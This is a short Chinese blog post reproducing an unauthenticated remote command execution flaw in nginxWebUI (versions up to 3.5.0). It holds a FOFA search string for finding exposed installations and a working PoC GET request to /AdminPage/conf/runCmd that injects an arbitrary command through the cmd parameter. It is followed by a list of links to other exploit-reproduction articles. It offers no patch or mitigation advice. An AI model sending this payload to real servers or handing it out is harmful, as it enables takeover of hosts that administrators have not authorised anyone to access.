nginxWebUI的runCmd RCE漏洞复制
最编程
2024-07-14 17:24:34
...
0x01 产品简介
nginxWebUI是一款图形化管理nginx配置的工具,能通过网页快速配置nginx的各种功能,包括HTTP和TCP协议转发、反向代理、负载均衡、静态HTML服务器以及SSL证书的自动申请、续签和配置,配置完成后可以一键生成nginx.conf文件,并控制nginx使用此文件进行启动和重载。
0x02 漏洞概述
nginxWebUI后台提供执行nginx相关命令的接口,由于未对用户的输入进行过滤,导致可在后台执行任意命令。并且该系统权限校验存在问题,导致存在权限绕过,在前台可直接调用后台接口,最终可以达到无条件远程命令执行的效果。
0x03 影响范围
nginxWebUI <= 3.5.0
0x04 复现环境
FOFA:app="nginxWebUI"
0x05 漏洞复现
PoC
GET /AdminPage/conf/runCmd?cmd=执行的命令%26%26echo%20nginx HTTP/1.1
Host: your-ip
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q
上一篇: 命令执行漏洞详解 - 向日葵命令执行
下一篇: 命令执行漏洞解释和 DVWA 范围演练
推荐阅读
-
简单复制nginxWebUI runCmd命令执行漏洞
-
RCE(远程命令/代码执行漏洞)原理与复制
-
nginxWebUI的runCmd RCE漏洞复制
-
[漏洞复制] Fastjson 0x01 漏洞概述 漏洞描述 Fastjson 是一个开源 JSON 解析库,可解析 JSON 格式的字符串,并支持将 Java Bean 序列化为 JSON 字符串,以及将 JSON 字符串反序列化为 Java Bean。 当应用程序或系统使用 Fastjson 解析用户可控制的 JSON 字符串数据时,Fastjson 存在远程代码执行漏洞,可能导致远程代码执行危险。 该漏洞是 17 年前 Fastjson 1.2.24 版本反序列化漏洞的扩展,不需要依赖于
-
[log4j2 漏洞的复制与利用]
-
通知/索引界面上的 WeiPHP RCE 漏洞
-
ms03-026 漏洞的原理与复制
-
用友 NC uapjs RCE 漏洞复制 (CNVD-C-2023-76801)
-
vulhub 中的 Apache Solr 远程命令执行漏洞复制 (CVE-2019-0193)
-
关于 CMSMS 中 SQL 注入漏洞的复制、分析和利用 - 前言